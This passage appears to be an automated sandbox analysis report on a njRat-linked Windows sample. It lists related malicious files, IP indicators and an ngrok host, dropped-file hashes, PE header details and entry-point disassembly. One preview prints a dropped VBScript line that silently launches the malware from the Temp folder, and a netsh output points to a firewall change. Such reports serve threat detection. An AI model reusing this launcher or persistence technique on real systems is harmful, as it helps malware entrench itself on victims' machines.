            jango.exeGet hashmaliciousXWormBrowse
              cracksetup.exeGet hashmaliciousNanocoreBrowse
                LocalStaFvjUblU.exeGet hashmaliciousnjRatBrowse
                  558EofiXYO.exeGet hashmaliciousnjRatBrowse
                    JsYdl3ZkOA.exeGet hashmaliciousnjRatBrowse
                      ehqsU9jDFb.exeGet hashmaliciousnjRatBrowse
                        EADSXus8Cw.exeGet hashmaliciousnjRatBrowse
                          KPiASQ9E43.exeGet hashmaliciousNjratBrowse
                            3.6.98.232iR2UtZj5vP.exeGet hashmaliciousNjratBrowse
                              ZB7Ot9MOic.exeGet hashmaliciousNjratBrowse
                                etJZk4UQhS.exeGet hashmaliciousNjratBrowse
                                  jango.exeGet hashmaliciousXWormBrowse
                                    cracksetup.exeGet hashmaliciousNanocoreBrowse
                                      LocalStaFvjUblU.exeGet hashmaliciousnjRatBrowse
                                        JsYdl3ZkOA.exeGet hashmaliciousnjRatBrowse
                                          ehqsU9jDFb.exeGet hashmaliciousnjRatBrowse
                                            EADSXus8Cw.exeGet hashmaliciousnjRatBrowse
                                              KPiASQ9E43.exeGet hashmaliciousNjratBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                0.tcp.in.ngrok.ioiR2UtZj5vP.exeGet hashmaliciousNjratBrowse
                                                • 3.6.122.107
                                                ZB7Ot9MOic.exeGet hashmaliciousNjratBrowse
                                                • 3.6.30.85
                                                etJZk4UQhS.exeGet hashmaliciousNjratBrowse
                                                • 3.6.122.107
                                                jango.exeGet hashmaliciousXWormBrowse
                                                • 3.6.30.85
                                                cracksetup.exeGet hashmaliciousNanocoreBrowse
                                                • 3.6.98.232
                                                LocalStaFvjUblU.exeGet hashmaliciousnjRatBrowse
                                                • 3.6.122.107
                                                558EofiXYO.exeGet hashmaliciousnjRatBrowse
                                                • 3.6.115.64
                                                JsYdl3ZkOA.exeGet hashmaliciousnjRatBrowse
                                                • 3.6.115.64
                                                ehqsU9jDFb.exeGet hashmaliciousnjRatBrowse
                                                • 3.6.115.182
                                                EADSXus8Cw.exeGet hashmaliciousnjRatBrowse
                                                • 3.6.30.85
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AMAZON-02USDjjEcDvMht.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 99.84.208.24
                                                https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0Get hashmaliciousUnknownBrowse
                                                • 3.163.101.33
                                                Solicitud de precio (ORDEN DE COMPRA A4-000004024).bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 13.248.169.48
                                                5Jrztt780M.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 13.225.63.72
                                                file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 3.163.101.39
                                                e4iTc2lcEI.elfGet hashmaliciousGafgytBrowse
                                                • 34.249.145.219
                                                5YHWYgenk4.elfGet hashmaliciousGafgytBrowse
                                                • 34.243.160.129
                                                99aEp0eNqa.elfGet hashmaliciousGafgytBrowse
                                                • 34.249.145.219
                                                https://bigassfans.com/Get hashmaliciousUnknownBrowse
                                                • 52.85.61.104
                                                https://indd.adobe.com/view/f59c3477-e403-4705-9b6a-e219aa9c5e4cGet hashmaliciousUnknownBrowse
                                                • 75.2.57.54
                                                AMAZON-02USDjjEcDvMht.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 99.84.208.24
                                                https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0Get hashmaliciousUnknownBrowse
                                                • 3.163.101.33
                                                Solicitud de precio (ORDEN DE COMPRA A4-000004024).bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 13.248.169.48
                                                5Jrztt780M.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 13.225.63.72
                                                file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 3.163.101.39
                                                e4iTc2lcEI.elfGet hashmaliciousGafgytBrowse
                                                • 34.249.145.219
                                                5YHWYgenk4.elfGet hashmaliciousGafgytBrowse
                                                • 34.243.160.129
                                                99aEp0eNqa.elfGet hashmaliciousGafgytBrowse
                                                • 34.249.145.219
                                                https://bigassfans.com/Get hashmaliciousUnknownBrowse
                                                • 52.85.61.104
                                                https://indd.adobe.com/view/f59c3477-e403-4705-9b6a-e219aa9c5e4cGet hashmaliciousUnknownBrowse
                                                • 75.2.57.54
                                                AMAZON-02USDjjEcDvMht.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 99.84.208.24
                                                https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0Get hashmaliciousUnknownBrowse
                                                • 3.163.101.33
                                                Solicitud de precio (ORDEN DE COMPRA A4-000004024).bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 13.248.169.48
                                                5Jrztt780M.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 13.225.63.72
                                                file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                • 3.163.101.39
                                                e4iTc2lcEI.elfGet hashmaliciousGafgytBrowse
                                                • 34.249.145.219
                                                5YHWYgenk4.elfGet hashmaliciousGafgytBrowse
                                                • 34.243.160.129
                                                99aEp0eNqa.elfGet hashmaliciousGafgytBrowse
                                                • 34.249.145.219
                                                https://bigassfans.com/Get hashmaliciousUnknownBrowse
                                                • 52.85.61.104
                                                https://indd.adobe.com/view/f59c3477-e403-4705-9b6a-e219aa9c5e4cGet hashmaliciousUnknownBrowse
                                                • 75.2.57.54
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)iR2UtZj5vP.exeGet hashmaliciousNjratBrowse
                                                  l0HzgCOAMF.exeGet hashmaliciousNjratBrowse
                                                    clSwWjTkJf.exeGet hashmaliciousNjratBrowse
                                                      _____(NYCU_2307-19TW)#Ufffdpdf.exeGet hashmaliciousNanocore, GuLoader, MailPassView, RemcosBrowse
                                                        1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                          DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exeGet hashmaliciousNanocore, GuLoaderBrowse
                                                            0473350311911207E#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoader, MailPassView, RemcosBrowse
                                                              PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                  DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                    C:\Users\user\AppData\Local\Temp\WindowsServices.exeiR2UtZj5vP.exeGet hashmaliciousNjratBrowse
                                                                      l0HzgCOAMF.exeGet hashmaliciousNjratBrowse
                                                                        clSwWjTkJf.exeGet hashmaliciousNjratBrowse
                                                                          _____(NYCU_2307-19TW)#Ufffdpdf.exeGet hashmaliciousNanocore, GuLoader, MailPassView, RemcosBrowse
                                                                            1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                              DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exeGet hashmaliciousNanocore, GuLoaderBrowse
                                                                                0473350311911207E#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoader, MailPassView, RemcosBrowse
                                                                                  PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                                    2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                                      DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                                        Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):525
                                                                                        Entropy (8bit):5.259753436570609
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                                                                        MD5:260E01CC001F9C4643CA7A62F395D747
                                                                                        SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                                                                        SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                                                                        SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                                                                        Process:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):525
                                                                                        Entropy (8bit):5.259753436570609
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                                                                        MD5:260E01CC001F9C4643CA7A62F395D747
                                                                                        SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                                                                        SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                                                                        SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                                                                        Process:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):4.9674574626610895
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                                        MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                        SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                                        SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                                        SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Joe Sandbox View:
                                                                                        • Filename: iR2UtZj5vP.exe, Detection: malicious, Browse
                                                                                        • Filename: l0HzgCOAMF.exe, Detection: malicious, Browse
                                                                                        • Filename: clSwWjTkJf.exe, Detection: malicious, Browse
                                                                                        • Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious, Browse
                                                                                        • Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious, Browse
                                                                                        • Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious, Browse
                                                                                        • Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious, Browse
                                                                                        • Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):4.9674574626610895
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                                        MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                        SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                                        SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                                        SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Joe Sandbox View:
                                                                                        • Filename: iR2UtZj5vP.exe, Detection: malicious, Browse
                                                                                        • Filename: l0HzgCOAMF.exe, Detection: malicious, Browse
                                                                                        • Filename: clSwWjTkJf.exe, Detection: malicious, Browse
                                                                                        • Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious, Browse
                                                                                        • Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious, Browse
                                                                                        • Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious, Browse
                                                                                        • Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious, Browse
                                                                                        • Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):348002
                                                                                        Entropy (8bit):5.838916133471261
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:KSTz3MaMNhXbyuWt2EHOO+7qeA5fphPFrKz1K5gkg//r0OKYUPR6fTD:3Ty7Ats/w6LD
                                                                                        MD5:ACB30A04DA7096C99877B47F3050190D
                                                                                        SHA1:89299EF483F4C276260193AE2FE4AB4F014C12AA
                                                                                        SHA-256:43F9346F00F00794F88D0D23B096B19E6BBD95AC7BDE24B2619E139E1A7CC239
                                                                                        SHA-512:B4DDAE99CCBA2D2AFF8EE08BF76BEA557650645944593EE133FCA923196D6DA12415A0D856452EDDCC2721A0E2714A26476B09DE54E7EE681CD9D3A1A01E406D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 87%
                                                                                        • Antivirus: Virustotal, Detection: 86%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L.....\.....................`....................@.......................... ..............................................P...x....................................................................................................................text............................... ..`.rdata........... ..................@..@.data..../.......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):116
                                                                                        Entropy (8bit):4.893878336926311
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:VfX9GTfmQKn0eFH5Ot+kiE2J5xAI6tHJUkn:VtGTfmQolFHIwkn23fOakn
                                                                                        MD5:ED68606120D25DF895C95AA5543C5193
                                                                                        SHA1:539AB5F1C9607DCC3B873D34DE2F0AF1E08EBD1C
                                                                                        SHA-256:A75FFBB9CB1901F530404F2BA80E53791A7A759D2DAACA8A81A5E70DD83F25D6
                                                                                        SHA-512:994DE00793A62B68056772924E6C7BC058510F5890BAD360AC668E56538EABAB6C11AB663C999B88E37153E798EAC94B06820F24F564679AF541AC72EFA26BDC
                                                                                        Malicious:true
                                                                                        Preview:on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: ..
                                                                                        Process:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):4.9674574626610895
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                                        MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                        SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                                        SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                                        SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):4.9674574626610895
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                                        MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                        SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                                        SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                                        SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\netsh.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):313
                                                                                        Entropy (8bit):4.971939296804078
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                                                                                        MD5:689E2126A85BF55121488295EE068FA1
                                                                                        SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                                                                                        SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                                                                                        SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                                                                                        Malicious:false
                                                                                        Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):5.838916133471261
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:nOZ2Oqnzbz.exe
                                                                                        File size:348'002 bytes
                                                                                        MD5:acb30a04da7096c99877b47f3050190d
                                                                                        SHA1:89299ef483f4c276260193ae2fe4ab4f014c12aa
                                                                                        SHA256:43f9346f00f00794f88d0d23b096b19e6bbd95ac7bde24b2619e139e1a7cc239
                                                                                        SHA512:b4ddae99ccba2d2aff8ee08bf76bea557650645944593ee133fca923196d6da12415a0d856452eddcc2721a0e2714a26476b09de54e7ee681cd9d3a1a01e406d
                                                                                        SSDEEP:6144:KSTz3MaMNhXbyuWt2EHOO+7qeA5fphPFrKz1K5gkg//r0OKYUPR6fTD:3Ty7Ats/w6LD
                                                                                        TLSH:8F741A8FED44DBBAC26E86B6D5AF075E43524322AE0B3647A33D9091791374323B634D
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L..
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x40b10f
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x5CEE8DCE [Wed May 29 13:49:02 2019 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:676f4bc1db7fb9f072b157186a10179e
                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push FFFFFFFFh
                                                                                        push 0040C7C0h
                                                                                        push 0040B296h
                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                        push eax
                                                                                        mov dword ptr fs:[00000000h], esp
                                                                                        sub esp, 68h
                                                                                        push ebx
                                                                                        push esi
                                                                                        push edi
                                                                                        mov dword ptr [ebp-18h], esp
                                                                                        xor ebx, ebx
                                                                                        mov dword ptr [ebp-04h], ebx
                                                                                        push 00000002h
                                                                                        call dword ptr [0040C268h]
                                                                                        pop ecx
                                                                                        or dword ptr [00440FACh], FFFFFFFFh
                                                                                        or dword ptr [00440FB0h], FFFFFFFFh
                                                                                        call dword ptr [0040C2B8h]
                                                                                        mov ecx, dword ptr [00440FA0h]
                                                                                        mov dword ptr [eax], ecx
                                                                                        call dword ptr [0040C2BCh]
                                                                                        mov ecx, dword ptr [00440F9Ch]
                                                                                        mov dword ptr [eax], ecx
                                                                                        mov eax, dword ptr [0040C2B0h]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov dword ptr [00440FA8h], eax
                                                                                        call 00007FE75CC8DD0Ch
                                                                                        cmp dword ptr [00440EC0h], ebx
                                                                                        jne 00007FE75CC8DBFEh
                                                                                        push 0040B292h
                                                                                        call dword ptr [0040C2ACh]
                                                                                        pop ecx
                                                                                        call 00007FE75CC8DCDEh
                                                                                        push 0040E014h
                                                                                        push 0040E010h
                                                                                        call 00007FE75CC8DCC9h
                                                                                        mov eax, dword ptr [00440F98h]
                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                        lea eax, dword ptr [ebp-6Ch]
                                                                                        push eax
                                                                                        push dword ptr [00440F94h]
                                                                                        lea eax, dword ptr [ebp-64h]
                                                                                        push eax
                                                                                        lea eax, dword ptr [ebp-70h]
                                                                                        push eax
                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                        push eax
                                                                                        call dword ptr [0040C2A4h]
                                                                                        push 0040E00Ch
                                                                                        push 0040E000h
                                                                                        call 00007FE75CC8DC96h
                                                                                        Programming Language:
                                                                                        • [C++] VS98 (6.0) SP6 build 8804
                                                                                        • [C++] VS98 (6.0) build 8168
                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xcc500x78.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x410000x6ec.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000xa6920xb00046e431cfe2a9ff66c9f2acb67ae1741fFalse0.394287109375data6.066698480794713IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0xc0000x13f20x20008e51e8226f8762c1d694ab2f869e1a74False0.2220458984375data2.813303655539336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
